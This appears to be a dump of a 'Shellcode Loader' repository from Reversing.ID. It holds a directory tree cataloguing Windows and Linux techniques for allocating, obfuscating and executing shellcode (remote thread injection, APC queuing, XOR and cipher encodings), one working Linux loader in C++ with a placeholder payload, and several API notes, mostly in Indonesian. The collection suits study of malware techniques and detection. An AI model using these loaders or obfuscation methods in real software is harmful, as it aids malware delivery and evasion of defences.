├── README.EN.md ├── README.md ├── linux ├── execution │ └── invoke │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp └── storage │ └── stack │ ├── README.md │ └── c++ │ └── code.cpp └── windows ├── README.md ├── allocation ├── AllocADsMem │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CoTaskMemAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CreateFileMapping │ ├── README.md │ └── c++ │ │ └── code.cpp ├── GlobalAlloc-GHND │ ├── README.md │ └── c++ │ │ └── code.cpp ├── GlobalAlloc-GPTR │ ├── README.md │ └── c++ │ │ └── code.cpp ├── HeapAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtAllocateVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtCreateSection │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtCreateSectionEx │ ├── README.md │ └── c++ │ │ └── code.cpp ├── README.md ├── RtlAllocateHeap │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualAlloc2 │ ├── README.md │ └── c++ │ │ └── code.cpp └── VirtualAllocEx │ ├── README.md │ └── c++ │ └── code.cpp ├── execution ├── asm-jmp │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs ├── callback │ ├── CallWindowProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumPhysicalStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumSystemStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumSystemStoreLocation │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertFindChainInStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ChooseColor │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ChooseFont │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CopyFile2 │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CopyFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreatePropertySheetPage │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptDecodeMessage │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptEnumKeyIdentifierProperties │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptEnumOIDFunction │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptEnumOIDInfo │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptInstallOIDFunctionAddress │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptVerifyMessageSignature │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DPA_DestroyCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DPA_EnumCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DSA_DestroyCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DSA_EnumCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DialogBoxIndirectParam │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DirectSoundCaptureEnumerate │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DirectSoundEnumerate │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DrawState │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfo │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfoEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfoExEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumChildWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormats │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormatsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormatsExEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDesktopWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDesktops │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDirTree │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDisplayMonitors │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFontFamilies │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFontFamiliesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFonts │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumLanguageGroupLocales │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumMetaFile │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumObjects │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPageFiles │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumProps │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPropsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPwrSchemes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumResourceLanguages │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ └── resources.rc │ ├── EnumResourceNames │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceNamesEx │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceTypes │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceTypesEx │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumSystemCodePages │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemGeoID │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLanguageGroups │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLocales │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLocalesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumThreadWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumTimeFormats │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumTimeFormatsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumUILanguages │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumWindowStations │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumerateLoadedModules │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumerateLoadedModulesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FindDebugInfoFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FindExecutableImageEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GetOpenFileName │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GetSaveFileName │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GrayString │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ImageGetDigestStream │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ImmEnumInputContext │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── InitOnceExecuteOnce │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LdrEnumerateLoadedModules │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LdrpCallInitRoutine │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LineDDA │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── MappingRecognizeText │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyIpInterfaceChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyRouteChange2 │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyTeredoPortChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyUnicastIpAddressChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PageSetupDlg │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PlaExtractCabinet │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PrintDlg │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PropertySheet │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ ├── ReadFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SHBrowseForFolder │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SendMessageCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetWinEventHook │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetupCommitFileQueue │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SymEnumProcesses │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SymFindFileInPath │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── VerifierEnumerateResource │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WriteFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WsPullBytes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WsPushBytes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── acmDriverEnum │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── mciSetYieldProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── mmioInstallIOProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── waveInOpen │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── waveOutOpen │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── event │ ├── CreateThreadpoolTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreateThreadpoolWait │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreateTimerQueueTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NtQueueApcThread │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NtQueueApcThreadEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── QueueUserAPC │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ ├── RegisterWaitForSingleObject │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetWaitableTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── timeSetEvent │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── exception │ ├── AddVectoredExceptionHandler │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetUnhandledExceptionFilter │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── seh-catch-exception │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── fiber │ ├── CreateFiber │ │ ├── README.md │ │ ├── c++ │ │ │ └── code.cpp │ │ └── rust │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ └── main.rs │ ├── CreateFiberEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FlsAlloc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ └── RtlUserFiberStart │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── invoke │ ├── README.md │ ├── c# │ │ └── code.cs │ ├── c++ │ │ └── code.cpp │ ├── go │ │ └── code.go │ ├── nim │ │ └── code.nim │ ├── python │ │ └── code.py │ └── rust │ │ └── with-mmap │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs └── thread │ ├── CreateRemoteThread │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── with-winapi │ │ ├── Cargo.toml │ │ └── src │ │ │ └── main.rs │ │ └── with-windows-sys │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── CreateRemoteThreadEx │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── CreateThread │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── CreateThreadpoolWork │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── EtwpCreateEtwThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── NtCreateThreadEx │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── README.md │ ├── RtlCreateUserThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── SHCreateThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── SHCreateThreadWithHandle │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── TpSimpleTryPost │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── TrySubmitThreadpoolCallback │ ├── README.md │ └── c++ │ │ └── code.cpp │ └── tls-callback │ ├── README.md │ └── c++ │ └── code.cpp ├── permission ├── NtProtectVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualProtect │ ├── README.md │ └── c++ │ │ └── code.cpp └── VirtualProtectEx │ ├── README.md │ └── c++ │ └── code.cpp ├── storage ├── download-http │ ├── winhttp │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── wininet │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── global │ ├── README.md │ └── c++ │ │ └── code.cpp ├── resource │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── resources.h │ │ ├── resources.rc │ │ ├── resources.res │ │ └── shellcode.bin ├── section │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs └── stack │ ├── README.md │ ├── c# │ └── code.cs │ ├── c++ │ └── code.cpp │ ├── crystal │ └── code.cr │ ├── dart │ ├── code.dart │ └── pubspec.yaml │ ├── go │ └── code.go │ ├── nim │ └── code.nim │ ├── python │ └── code.py │ ├── rust │ ├── plain-winapi │ │ ├── Cargo.toml │ │ └── src │ │ │ └── main.rs │ └── with-wrapper │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── v │ └── code.v │ └── zig │ ├── build.zig │ └── src │ └── main.zig └── writing ├── compression └── Decompress │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.cpp │ └── shellcode.bin ├── conversion ├── README.md ├── RtlEthernetStringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv4StringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv4StringToAddressEx │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv6StringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── UuidFromString │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin └── endianness │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── copy ├── CopyMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CreatePipe │ ├── README.md │ └── c++ │ │ └── code.cpp ├── MoveMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtWriteVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── RtlMoveMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── WriteProcessMemory │ ├── README.md │ └── c++ │ │ └── code.cpp └── memcpy │ ├── README.md │ └── c++ │ └── code.cpp ├── custom ├── bit-crossover │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── bit-rotation │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── bit-swap │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── feistel │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── padding-dynamic │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-chain │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-lfsr │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-multikey │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-pair │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-singlekey-ctr │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin └── xor-singlekey │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.py │ └── shellcode.bin ├── encryption ├── README.md ├── block │ ├── 3-way │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── README.md │ ├── aes │ │ └── CryptDecrypt │ │ │ ├── README.md │ │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── anubis │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── blowfish │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── camellia │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── cipherunicorn-a │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── clefia │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── des │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── hierocrypt3 │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── khazad │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── khufu │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── lea │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── lucifer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── safer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── tea │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── treyfer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ └── xtea │ │ ├── README.md │ │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin └── stream │ ├── README.md │ └── rc4 │ └── SystemFunction │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── misc └── rust │ └── memmap2 │ ├── Cargo.toml │ ├── README.md │ └── src │ └── main.rs ├── permutation ├── README.md ├── column-ordering │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── fisher-yates │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── rail-fence │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── row-ordering │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── snake │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin └── spiral │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.py │ └── shellcode.bin └── substitution ├── affine-cipher ├── README.md └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── atbash ├── README.md └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin └── hill-cipher ├── README.md └── c++ ├── code.cpp ├── generator.cpp └── shellcode.bin /linux/execution/invoke/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode dengan cast shellcode sebagai function/procedur dan memanggil shellcode secara langsung. Shellcode akan dieksekusi pada thread yang sama dengan thread pemanggil. -------------------------------------------------------------------------------- /linux/execution/invoke/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Executing shellcode as new thread. 6 | 7 | Compile: 8 | $ g++ code.cpp 9 | 10 | Technique: 11 | - allocation: mmap 12 | - writing: memcpy 13 | - permission: mprotect 14 | - execution: 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | int main () 23 | { 24 | void * runtime; 25 | int retval; 26 | 27 | // shellcode storage in stack 28 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 29 | uint32_t payload_len = 4; 30 | 31 | // allocate memory buffer for payload as READ-WRITE (no executable) 32 | runtime = mmap (0, payload_len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); 33 | 34 | // copy payload to the buffer 35 | memcpy (runtime, payload, payload_len); 36 | 37 | // make buffer executable (R-X) 38 | retval = mprotect (runtime, payload_len, PROT_READ|PROT_EXEC); 39 | if (retval == 0) 40 | { 41 | // create pointer to function and assign with address of shellcode 42 | int (*func)(); 43 | func = (int (*)())runtime; 44 | 45 | // executing 46 | func(); 47 | } 48 | 49 | // dealocate memory map 50 | munmap (runtime, payload_len); 51 | 52 | return 0; 53 | } -------------------------------------------------------------------------------- /linux/storage/stack/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as local data in stack (array). 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada stack, dengan karakteristik adanya operasi push. Array dapat diakses melalui alamat memory relatif terhadap pointer. -------------------------------------------------------------------------------- /windows/allocation/AllocADsMem/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `AllocADsMem`. 8 | 9 | ```c++ 10 | LPVOID AllocADsMem (DWORD cb); 11 | 12 | BOOL FreeADsMem (LPVOID pMem); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN AllocADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-allocadsmem) 18 | - [MSDN FreeADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-freeadsmem) -------------------------------------------------------------------------------- /windows/allocation/CoTaskMemAlloc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `CoTaskMemAlloc`. 8 | 9 | ```c++ 10 | LPVOID CoTaskMemAlloc (SIZE_T cb); 11 | 12 | void CoTaskMemFree (LPVOID pv); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CoTaskMemAlloc](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemalloc) 18 | - [MSDN CoTaskMemFree](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemfree) -------------------------------------------------------------------------------- /windows/allocation/GlobalAlloc-GHND/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `GlobalAlloc` dan dapatkan handle ke area yang telah dialokasikan. Alamat buffer diperoleh melalui `GlobalLock`. 8 | 9 | ```c++ 10 | HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes); 11 | 12 | LPVOID GlobalLock (HGLOBAL hMem); 13 | 14 | BOOL GlobalUnlock (HGLOBAL hMem); 15 | 16 | HGLOBAL GlobalFree (HGLOBAL hMem); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc) 22 | - [MSDN GlobalLock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globallock) 23 | - [MSDN GlobalUnlock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalunlock) 24 | - [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree) -------------------------------------------------------------------------------- /windows/allocation/GlobalAlloc-GPTR/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `GlobalAlloc` dan dapatkan pointer ke area yang telah dialokasikan. 8 | 9 | ```c++ 10 | HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes); 11 | 12 | HGLOBAL GlobalFree (HGLOBAL hMem); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc) 18 | - [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree) -------------------------------------------------------------------------------- /windows/allocation/HeapAlloc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi menggunakan `HeapAlloc`. Namun, alokasi dilakukan pada segment heap terpisah dan tidak menggunakan Heap default. 8 | 9 | ```c++ 10 | LPVOID HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 11 | 12 | HANDLE HeapCreate (DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize); 13 | 14 | BOOL HeapFree (HANDLE hHeap, DWORD dwFlags, _Frees_ptr_opt_ LPVOID lpMem); 15 | 16 | BOOL HeapDestroy (HANDLE hHeap); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN HeapAlloc](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc) 22 | - [MSDN HeapCreate](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate) 23 | - [MSDN HeapFree](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapfree) 24 | - [MSDN HeapDestroy](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapdestroy) -------------------------------------------------------------------------------- /windows/allocation/NtAllocateVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Allocate memory for executing shellcode later. 4 | 5 | ### Overview 6 | 7 | Alokasi dengan `NtAllocateVirtualMemory` dan dealokasi dengan `NtFreeVirtualMemory`. 8 | 9 | ```c++ 10 | NTSTATUS NtAllocateVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect); 11 | 12 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 13 | 14 | NTSTATUS NtFreeVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG RegionSize, ULONG FreeType); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [NTInternals 